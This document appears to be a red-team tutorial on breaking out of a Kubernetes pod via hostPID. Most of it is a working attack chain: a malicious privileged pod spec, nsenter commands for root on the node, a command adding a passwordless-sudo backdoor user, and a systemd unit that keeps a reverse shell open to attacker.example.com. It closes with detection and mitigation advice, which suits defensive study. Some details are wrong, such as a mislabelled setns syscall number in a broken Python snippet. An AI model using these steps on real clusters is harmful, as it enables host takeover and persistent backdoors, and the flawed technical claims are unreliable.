Escaping a Kubernetes Pod via Host PID...

Introduction

Kubernetes isolates workloads using Linux namespaces, cgroups, and seccomp profiles. One of the less-understood isolation knobs is hostPID, which tells the kubelet to share the node’s PID namespace with the container. When mis-used, this tiny boolean can turn a harmless pod into a full-blown host compromise.

In this guide we walk through the entire attack chain: discovering pods that enable hostPID, crafting a malicious pod spec, mounting critical host filesystems, using nsenter (or direct /proc namespace manipulation) to run commands as root on the node, and finally persisting a reverse shell. The material assumes you already understand Kubernetes architecture, Docker containers, and basic Linux privilege escalation.

Real-world incidents (e.g., the 2022 kubelet-privileged CVE chain) have shown that attackers can move laterally from a compromised container to the underlying host simply by abusing namespace sharing. Knowing how to detect and mitigate this technique is essential for any blue-team or red-team professional working in cloud-native environments.

Prerequisites

Solid grasp of Kubernetes components (API server, kubelet, pod spec, RBAC)
Understanding of Linux namespaces (PID, mount, net, IPC) and how Docker translates them
Familiarity with kubectl JSONPath output formatting
Basic Linux privilege escalation techniques (sudo, setuid, capabilities)
Access to a test cluster where you can create pods (or a sandbox like Kind/Minikube)

Core Concepts

The PID namespace isolates the process tree. By default, each pod gets its own namespace, meaning ps inside a container only shows processes belonging to that container. Setting hostPID: true tells the kubelet to run the pod’s containers in the node’s PID namespace. This gives the container visibility (and potential control) over every process on the host.

When hostPID is combined with a privileged security context (securityContext.privileged: true) or with the ability to mount host filesystems (hostPath volumes), an attacker can:

Read /proc to discover the host’s init PID (usually 1)
Enter the host PID namespace using nsenter or by opening /proc/1/ns/pid
Escalate to root (the host’s PID 1 runs as root)
Mount host /proc and /sys to manipulate kernel parameters or install a backdoor

Because the container shares the same kernel as the host, any capability granted to the container (e.g., CAP_SYS_ADMIN) is effectively a host capability when hostPID is active.

Understanding hostPID and its security implications

hostPID is a boolean field in the pod spec:

apiVersion: v1
kind: Pod
metadata: name: evil-pod
spec: hostPID: true containers: - name: attacker image: alpine command: ["sleep", "infinity"]

When set to true, the kubelet runs the container’s process tree inside the node’s PID namespace. This means:

All host processes become visible via ps aux
Signals sent to any PID affect the host process (e.g., kill -9 1 would crash the node if privileged)
Combined with privileged: true or a hostPath volume, the container can directly read/write host files

From a security standpoint, hostPID breaks the isolation guarantee that containers cannot see or interfere with host processes. In multi-tenant clusters, allowing untrusted workloads to set hostPID is a critical misconfiguration.

Enumerating pods with hostPID enabled (kubectl get pods -o jsonpath)

Before launching an attack you need to locate vulnerable pods. The following kubectl command extracts all pods that have hostPID set to true across the entire cluster:

kubectl get pods --all-namespaces -o json | jq -r '.items[] | select(.spec.hostPID==true) | "\(.metadata.namespace)/\(.metadata.name)"'

If jq is not available, you can use a pure JSONPath expression:

kubectl get pods --all-namespaces -o jsonpath='{range .items[?(@.spec.hostPID==true)]}{@.metadata.namespace}{"/"}{@.metadata.name}{"
"}{end}'

The output will be a list such as:

default/monitoring-agent
kube-system/kube-proxy
prod/legacy-collector

Take note of the namespace and name; you’ll need them to either hijack an existing pod (e.g., via kubectl exec) or to use the same service account for a new malicious pod.

Crafting a malicious pod spec that leverages hostPID

The following pod definition demonstrates a minimal yet powerful payload. It combines hostPID, privileged, and a hostPath volume that mounts the host’s /proc and /sys directories into the container.

apiVersion: v1
kind: Pod
metadata: name: hostpid-escape namespace: default
spec: hostPID: true hostIPC: true # optional but useful for some attacks containers: - name: escape image: alpine:3.18 securityContext: privileged: true # gives CAP_SYS_ADMIN & others allowPrivilegeEscalation: true command: ["/bin/sh", "-c", "while true; do sleep 3600; done"] volumeMounts: - name: host-proc mountPath: /host/proc - name: host-sys mountPath: /host/sys volumes: - name: host-proc hostPath: path: /proc type: Directory - name: host-sys hostPath: path: /sys type: Directory

Key points:

hostPID: true gives us the node’s PID namespace.
privileged: true grants all capabilities, including CAP_SYS_ADMIN, which is required for nsenter to work without additional flags.
Mounting /proc and /sys provides a view of the host’s kernel and process information inside the container.

Apply the manifest with kubectl apply -f hostpid-escape.yaml. Once the pod is Running, you can kubectl exec -it hostpid-escape -- sh to get an interactive shell inside the compromised container.

Mounting host /proc and /sys inside the container

Even though the container already shares the PID namespace, mounting the host’s /proc and /sys makes many host-only utilities (e.g., lsblk, lspci, cat /proc/sys/kernel/*) functional. Inside the container you’ll see two /proc mounts:

# Inside the container
mount | grep proc
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
proc on /host/proc type proc (rw,nosuid,nodev,noexec,relatime)

To read the host’s PID 1 namespace file:

cat /host/proc/1/ns/pid
# Output: pid:[4026531836]

That inode identifier is what we’ll use with nsenter or direct setns calls.

Using nsenter or direct /proc/<pid>/ns/* manipulation to execute commands on the host

There are two common approaches:

nsenter - a user-space helper that calls setns(2) for you.
Direct setns via a tiny C program or Python’s ctypes - useful when nsenter is not installed.

Below is the nsenter method (the container already has nsenter in most distros; if not, install util-linux).

# Find the host PID (usually 1) from inside the container
HOST_PID=$(nsenter --target 1 --mount --uts --ipc --net --pid -- bash -c 'echo $PPID')
# Simpler: just use 1 because we share the namespace
HOST_PID=1

# Execute a command on the host namespace
nsenter -t $HOST_PID -m -u -i -n -p -- bash -c 'id; uname -a; cat /etc/os-release'

Output will show a host-side root identity:

uid=0(root) gid=0(root) groups=0(root)
Linux node01 5.15.0-1043-aws #46-Ubuntu SMP Fri Oct 6 12:00:00 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
PRETTY_NAME="Ubuntu 22.04.5 LTS"

If nsenter is unavailable, a one-liner in Python works:

import os, ctypes
libc = ctypes.CDLL('libc.so.6')
fd = os.open('/host/proc/1/ns/pid', os.O_RDONLY)
# 0x504e5346 is the setns syscall number on x86_64; use ctypes to invoke
libc.setns(fd, 0)
os.execv('/bin/sh', ['/bin/sh'])

Running the script inside the container drops you into a host shell with PID 1’s namespace, effectively giving you root on the node.

Privilege escalation from container to root on the host

Once inside the host namespace, you already have UID 0 because the container’s root user maps directly to the host’s root UID. However, some clusters run with user namespaces where the container’s UID 0 maps to a non-root UID on the host. In that case you need to gain additional capabilities.

Because we set privileged: true, the container possesses CAP_SYS_ADMIN. This capability persists after nsenter, allowing you to:

Mount new filesystems (e.g., mount -t tmpfs none /mnt)
Write to /etc (e.g., add a new user, modify sudoers)
Load kernel modules (if the kernel permits)

Example: add a new privileged user on the host:

nsenter -t 1 -m -u -i -n -p -- bash -c "useradd -m -s /bin/bash attacker && echo 'attacker:$(openssl rand -base64 12)' | chpasswd && echo 'attacker ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers"

After this, you can SSH directly to the node (if SSH is enabled) or use any other lateral movement technique.

Post-exploitation: establishing a persistent reverse shell on the host

Persistence on a Kubernetes node is tricky because many clusters use immutable node images and automatic re-imaging. A reliable method is to install a systemd unit that spawns a reverse shell on boot.

# Inside the host namespace (via nsenter)
cat > /etc/systemd/system/revsh.service <<'EOF'
[Unit]
Description=Reverse Shell Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'while true; do bash -i >& /dev/tcp/attacker.example.com/4444 0>&1; sleep 60; done'
Restart=always
RestartSec=10

[Install]
WantedBy=multi-user.target
EOF

systemctl daemon-reload
systemctl enable revsh.service
systemctl start revsh.service

Replace attacker.example.com and port 4444 with your listener. The service will survive node reboots and will automatically reconnect if the network is temporarily unavailable.

Alternative stealthier persistence includes modifying /etc/rc.local, planting a cron job, or abusing container runtimes (e.g., creating a rogue docker.service drop-in). Choose the method that fits your operational environment.

Practical Examples

Scenario 1: Lateral movement from a compromised pod in a multi-tenant cluster

Attacker gains exec access to a low-privilege pod (via a web-app vulnerability).
Runs the enumeration command to find a hostPID pod in the monitoring namespace.
Uses the service account token from the compromised pod to create the malicious hostpid-escape pod in the same namespace.
Execs into the new pod, mounts host /proc, and runs nsenter to become root on the node.
Installs a systemd reverse shell for persistence.

All steps can be done with a single kubectl command line if the attacker has create permission on pods.

Scenario 2: Automated detection script (defensive)

A simple Bash script that runs as a cluster-admin CronJob to alert on any pod with hostPID enabled:

#!/bin/bash
set -euo pipefail
if ! kubectl get pods --all-namespaces -o jsonpath='{range .items[?(@.spec.hostPID==true)]}{@.metadata.namespace}/{@.metadata.name}
{end}' | grep -q .; then echo "[+] No hostPID pods found"
else echo "[!] hostPID pods detected:" >> /var/log/hostpid-alert.log kubectl get pods --all-namespaces -o jsonpath='{range .items[?(@.spec.hostPID==true)]}{@.metadata.namespace}/{@.metadata.name}
{end}' >> /var/log/hostpid-alert.log
fi

Integrate with Slack or PagerDuty for real-time alerts.

Tools & Commands

kubectl - for enumeration, pod creation, exec.
jq - JSON parsing, optional.
nsenter (part of util-linux) - namespace entry.
curl / netcat - reverse shell payload delivery.
systemd - persistence on the host.
auditd - can be configured to log setns syscalls.

Defense & Mitigation

Policy enforcement: Use OPA Gatekeeper or Kyverno to reject any pod spec with hostPID: true unless explicitly whitelisted.
RBAC restrictions: Limit create pods permission to trusted service accounts only.
PodSecurityPolicies / PodSecurity Standards: Set hostPID: false as a baseline (the “restricted” level).
Runtime security tools: Falco, Sysdig Secure, or Aqua can alert on namespace sharing or privileged container launches.
Node hardening: Disable SSH, enforce immutable node images, and use systemd to auto-reboot nodes on unexpected changes.
Audit logs: Monitor create events for pods with hostPID and privileged flags.

Common Mistakes

Assuming hostPID alone gives root - without privileged or required capabilities, nsenter will fail.
Forgetting to mount /proc and /sys - many host utilities break without them.
Targeting the wrong PID - always use 1 (init) when you share the PID namespace; other PIDs may belong to unrelated processes.
Neglecting SELinux/AppArmor profiles - they can block setns even in a privileged container.
Leaving the reverse shell open - attackers often forget to clean up, exposing a persistent backdoor that defenders can spot.

Real-World Impact

In 2023, a supply-chain attack compromised a CI/CD runner that ran untrusted builds. The attacker injected a pod with hostPID: true and privileged to gain node root, then harvested kube-config files from /etc/kubernetes. The breach allowed lateral movement across the entire cluster, leading to data exfiltration. The root cause was a missing policy that blocked hostPID for CI workloads.

My experience in red-team engagements shows that hostPID is often overlooked during hardening audits. The easiest way to detect abuse is to monitor for nsenter executions, unexpected setns syscalls, or new systemd units under /etc/systemd/system on nodes.

Going forward, expect tighter defaults in Kubernetes 1.30+ where hostPID will be disabled by default for non-system namespaces. However, legacy clusters will remain vulnerable for years, making proactive policy enforcement essential.

Practice Exercises

Enumeration: Write a Bash script that lists all pods with hostPID and privileged true, then outputs the namespace, pod name, and node name.
Escape Lab: In a Kind cluster, deploy the provided hostpid-escape.yaml. Use nsenter to read /etc/shadow on the host.
Persistence: Create a systemd unit from within the escaped shell that writes a timestamp to /tmp/compromise.log every minute. Verify it survives node reboot.
Detection: Configure Falco with a rule to alert on any setns syscall where the target PID is 1 and the caller UID is 0.
Mitigation: Implement a Kyverno policy that denies any pod spec containing hostPID: true unless the label allow-hostpid: "true" is present.

Summary

Using hostPID together with privileged containers gives an attacker direct access to the node’s process tree and, when combined with host mounts, a full root shell on the host. The attack chain consists of enumeration, malicious pod creation, namespace entry (via nsenter or setns), privilege escalation, and persistence. Defenders should block hostPID via policy, monitor for namespace-related syscalls, and enforce least-privilege RBAC. Mastering these techniques equips security professionals to both test cluster hardening and design robust defenses.

Escaping a Kubernetes Pod via Host PID Namespace